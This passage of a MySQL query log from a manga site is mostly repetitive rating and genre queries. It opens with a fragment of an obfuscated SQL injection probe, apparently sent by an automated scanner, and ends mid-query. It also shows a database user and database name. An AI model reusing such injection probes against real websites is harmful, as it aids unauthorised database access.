'1\"And/**/3794=(%27~%27||(sELEct/**/CaSE/**/3794/**/whEN/**/3794/**/then/**/1/**/ELse/**/0/**/enD/**/fROM/**/RDB$DaTabase)||%27~%27) AND \"dFjS1kvv\"=\"dFjS1kvv\"' 330658716 Quit 330658717 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658717 Query SELECT sum(view) as total_view, m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) AND (m.genres like '%%') group by manga_id ORDER BY sum(view) DESC 330658717 Quit 330658718 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658719 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658718 Quit 330658719 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330658719 Quit 330658720 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658720 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '197' order by created desc 330658720 Quit 330658721 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658721 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '33' order by created desc 330658721 Quit 330658722 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658722 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '89' order by created desc 330658722 Quit 330658723 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658723 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '27' order by created desc 330658723 Quit 330658724 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658724 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '4' order by created desc 330658724 Quit 330658725 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658725 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '52' order by created desc 330658725 Quit 330658726 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658726 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '127' order by created desc 330658726 Quit 330658727 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658727 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '206' order by created desc 330658727 Quit 330658728 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658728 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '30' order by created desc 330658728 Quit 330658729 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658729 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '76' order by created desc 330658729 Quit 330658730 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658730 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '115' order by created desc 330658730 Quit 330658731 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658731 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '71' order by created desc 330658731 Quit 330658732 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658732 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '99' order by created desc 330658732 Quit 330658733 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658733 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '19' order by created desc 330658733 Quit 330658734 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658734 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '179' order by created desc 330658734 Quit 330658735 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658735 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '21' order by created desc 330658735 Quit 330658736 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658736 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '93' order by created desc 330658736 Quit 330658737 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658737 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '172' order by created desc 330658737 Quit 330658738 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658738 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '29' order by created desc 330658738 Quit 330658739 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658739 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '51' order by created desc 330658739 Quit 330658740 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658740 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '13' order by created desc 330658740 Quit 330658741 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658741 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '106' order by created desc 330658741 Quit 330658742 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658742 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '35' order by created desc 330658742 Quit 330658743 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658743 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '108' order by created desc 330658743 Quit 330658744 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658744 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '218' order by created desc 330658744 Quit 330658745 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658745 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '57' order by created desc 330658745 Quit 330658746 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658746 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '38' order by created desc 330658746 Quit 330658747 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658747 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '64' order by created desc 330658747 Quit 330658748 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658748 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '268' order by created desc 330658748 Quit 330658749 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658749 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '36' order by created desc 330658749 Quit 330658750 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658750 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '97' order by created desc 330658750 Quit 330658751 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658751 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '205' order by created desc 330658751 Quit 330658752 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658752 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '63' order by created desc 330658752 Quit 330658753 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658753 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '233' order by created desc 330658753 Quit 330658754 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658754 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '80' order by created desc 330658754 Quit 330658755 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658755 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '192' order by created desc 330658755 Quit 330658756 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658756 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '92' order by created desc 330658756 Quit 330658757 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658757 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '7' order by created desc 330658757 Quit 330658758 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658758 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '45' order by created desc 330658758 Quit 330658759 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658759 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '207' order by created desc 330658759 Quit 330658760 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658760 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '232' order by created desc 330658760 Quit 330658761 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658761 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '104' order by created desc 330658761 Quit 330658762 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658762 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '47' order by created desc 330658762 Quit 330658763 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658763 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '74' order by created desc 330658763 Quit 330658764 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658764 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '121' order by created desc 330658764 Quit 330658765 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658765 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '252' order by created desc 330658765 Quit 330658766 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658766 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '12' order by created desc 330658766 Quit 330658767 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658767 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '54' order by created desc 330658767 Quit 330658768 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658768 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '110' order by created desc 330658768 Quit 330658769 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658769 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '9' order by created desc 330658769 Quit 330658770 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658770 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '214' order by created desc 330658770 Quit 330658771 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658771 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '240' order by created desc 330658771 Quit 330658772 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658772 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '46' order by created desc 330658772 Quit 330658773 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658773 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '225' order by created desc 330658773 Quit 330658774 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658774 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '130' order by created desc 330658774 Quit 330658775 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658775 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '49' order by created desc 330658775 Quit 330658776 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658776 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '217' order by created desc 330658776 Quit 330658777 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658777 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '50' order by created desc 330658777 Quit 330658778 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658778 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '31' order by created desc 330658778 Quit 330658779 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658779 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '244' order by created desc 330658779 Quit 330658780 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658780 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '5' order by created desc 330658780 Quit 330658781 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658781 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '66' order by created desc 330658781 Quit 330658782 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658782 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '32' order by created desc 330658782 Quit 330658783 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658783 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '58' order by created desc 330658783 Quit 330658784 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658784 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '111' order by created desc 330658784 Quit 330658785 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658785 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '239' order by created desc 330658785 Quit 330658786 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658786 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '101' order by created desc 330658786 Quit 330658787 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658787 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '59' order by created desc 330658787 Quit 330658788 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658788 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '22' order by created desc 330658788 Quit 330658789 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658789 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '17' order by created desc 330658789 Quit 330658790 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658790 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '68' order by created desc 330658790 Quit 330658791 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658791 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '78' order by created desc 330658791 Quit 330658792 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658792 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '124' order by created desc 330658792 Quit 330658793 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658793 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '41' order by created desc 330658793 Quit 330658794 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658794 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '75' order by created desc 330658794 Quit 330658795 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658795 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '177' order by created desc 330658795 Quit 330658796 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658796 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '173' order by created desc 330658796 Quit 330658797 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658797 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '87' order by created desc 330658797 Quit 330658798 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658798 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '83' order by created desc 330658798 Quit 330658799 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658799 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '112' order by created desc 330658799 Quit 330658800 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658800 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '40' order by created desc 330658800 Quit 330658801 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658801 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '230' order by created desc 330658801 Quit 330658802 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658802 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '248' order by created desc 330658802 Quit 330658803 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658803 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '85' order by created desc 330658803 Quit 330658804 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658804 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '77' order by created desc 330658804 Quit 330658805 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658805 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '98' order by created desc 330658805 Quit 330658806 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658806 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '39' order by created desc 330658806 Quit 330658807 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658807 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '128' order by created desc 330658807 Quit 330658808 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658808 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '223' order by created desc 330658808 Quit 330658809 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658809 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '94' order by created desc 330658809 Quit 330658810 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658810 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '228' order by created desc 330658810 Quit 330658811 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658811 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '269' order by created desc 330658811 Quit 330658812 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658812 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '105' order by created desc 330658812 Quit 330658813 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658813 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '48' order by created desc 330658813 Quit 330658814 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658814 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '204' order by created desc 330658814 Quit 330658815 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658815 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '290' order by created desc 330658815 Quit 330658816 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658816 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '70' order by created desc 330658816 Quit 330658817 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658817 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '259' order by created desc 330658817 Quit 330658818 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658818 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '175' order by created desc 330658818 Quit 330658819 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658819 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '26' order by created desc 330658819 Quit 330658820 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658820 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '82' order by created desc 330658820 Quit 330658821 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658821 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '202' order by created desc 330658821 Quit 330658822 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658822 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '6' order by created desc 330658822 Quit 330658823 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658823 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '67' order by created desc 330658823 Quit 330658824 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658824 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '267' order by created desc 330658824 Quit 330658825 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658825 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '210' order by created desc 330658825 Quit 330658826 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658826 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '180' order by created desc 330658826 Quit 330658827 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658827 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '88' order by created desc 330658827 Quit 330658828 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658828 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '129' order by created desc 330658828 Quit 330658829 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658829 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '102' order by created desc 330658829 Quit 330658830 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658830 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '113' order by created desc 330658830 Quit 330658831 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658831 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '199' order by created desc 330658831 Quit 330658832 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658832 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '288' order by created desc 330658832 Quit 330658833 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658833 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '208' order by created desc 330658833 Quit 330658834 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658834 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '73' order by created desc 330658834 Quit 330658835 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658835 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '125' order by created desc 330658835 Quit 330658836 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658836 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '37' order by created desc 330658836 Quit 330658837 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658837 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '213' order by created desc 330658837 Quit 330658838 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658838 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '193' order by created desc 330658838 Quit 330658839 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658839 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '86' order by created desc 330658839 Quit 330658840 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658840 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '117' order by created desc 330658840 Quit 330658841 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658841 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '91' order by created desc 330658841 Quit 330658842 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658842 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '307' order by created desc 330658842 Quit 330658843 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658843 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '24' order by created desc 330658843 Quit 330658844 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658844 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '84' order by created desc 330658844 Quit 330658845 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658845 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '243' order by created desc 330658845 Quit 330658846 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658846 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '178' order by created desc 330658846 Quit 330658847 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658847 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '81' order by created desc 330658847 Quit 330658848 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658848 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '191' order by created desc 330658848 Quit 330658849 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658849 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '44' order by created desc 330658849 Quit 330658850 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658850 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '15' order by created desc 330658850 Quit 330658851 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658851 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '116' order by created desc 330658851 Quit 330658852 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658852 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '62' order by created desc 330658852 Quit 330658853 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658853 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '103' order by created desc 330658853 Quit 330658854 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658854 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '109' order by created desc 330658854 Quit 330658855 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658855 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '14' order by created desc 330658855 Quit 330658856 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658856 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '42' order by created desc 330658856 Quit 330658857 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658857 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '257' order by created desc 330658857 Quit 330658858 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658858 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '324' order by created desc 330658858 Quit 330658859 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658859 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '201' order by created desc 330658859 Quit 330658860 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658860 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '120' order by created desc 330658860 Quit 330658861 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658861 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '10' order by created desc 330658861 Quit 330658862 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658862 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '2' order by created desc 330658862 Quit 330658863 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658863 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '198' order by created desc 330658863 Quit 330658864 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658864 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '16' order by created desc 330658864 Quit 330658865 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658865 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '261' order by created desc 330658865 Quit 330658866 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658866 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '203' order by created desc 330658866 Quit 330658867 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658867 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '338' order by created desc 330658867 Quit 330658868 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658868 Query select count(id) as 